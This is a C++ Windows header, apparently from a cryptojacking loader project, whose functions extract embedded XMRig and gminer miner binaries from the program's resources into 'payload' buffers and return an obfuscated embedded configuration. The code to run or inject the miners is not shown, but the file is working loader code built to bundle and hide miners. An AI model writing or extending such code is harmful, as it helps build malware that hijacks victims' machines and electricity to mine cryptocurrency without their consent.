// embedded_resource.h
#pragma once
#include <windows.h>
#include <cstdint>
#include <utility>
#include "resources.h"  // Include the resource IDs
#include <stdexcept>

// Include the generated embedded config header if ENABLE_EMBEDDED_CONFIG is defined
#ifdef ENABLE_EMBEDDED_CONFIG
    #include "embedded_config_generated.h"
#endif

void LoadEmbeddedXMRig(BYTE*& payloadBuf, size_t& payloadSize) {
    HMODULE hModule = GetModuleHandle(nullptr);
    if (!hModule) throw std::runtime_error("Failed to get module handle.");

    HRSRC hRes = FindResource(hModule, MAKEINTRESOURCE(EMBEDDED_XMRIG), RT_RCDATA);
    if (!hRes) throw std::runtime_error("Failed to find XMRig resource.");

    HGLOBAL hResData = LoadResource(hModule, hRes);
    if (!hResData) throw std::runtime_error("Failed to load XMRig resource.");

    LPVOID pData = LockResource(hResData);
    if (!pData) throw std::runtime_error("Failed to lock XMRig resource.");

    DWORD size = SizeofResource(hModule, hRes);
    if (size == 0) throw std::runtime_error("XMRig resource size is zero.");

    payloadBuf = new BYTE[size];
    memcpy(payloadBuf, pData, size);
    payloadSize = static_cast<size_t>(size);
}

void LoadEmbeddedGminer(BYTE*& payloadBuf, size_t& payloadSize) {
    HMODULE hModule = GetModuleHandle(nullptr);
    if (!hModule) throw std::runtime_error("Failed to get module handle.");

    HRSRC hRes = FindResource(hModule, MAKEINTRESOURCE(EMBEDDED_GMINER), RT_RCDATA);
    if (!hRes) throw std::runtime_error("Failed to find gminer resource.");

    HGLOBAL hResData = LoadResource(hModule, hRes);
    if (!hResData) throw std::runtime_error("Failed to load gminer resource.");

    LPVOID pData = LockResource(hResData);
    if (!pData) throw std::runtime_error("Failed to lock gminer resource.");

    DWORD size = SizeofResource(hModule, hRes);
    if (size == 0) throw std::runtime_error("Gminer resource size is zero.");

    payloadBuf = new BYTE[size];
    memcpy(payloadBuf, pData, size);
    payloadSize = static_cast<size_t>(size);
}

// LoadEmbeddedConfig uses the OBFUSCATE_STRING macro from generated header
// The header is generated by CMake from embedded_config.json
inline std::string LoadEmbeddedConfig() {
#ifdef ENABLE_EMBEDDED_CONFIG
    // Return the deobfuscated config string (EMBEDDED_CONFIG_JSON is from embedded_config_generated.h)
    return EMBEDDED_CONFIG_JSON;
#else
    throw std::runtime_error("Embedded config is not enabled at compile time.");
#endif
}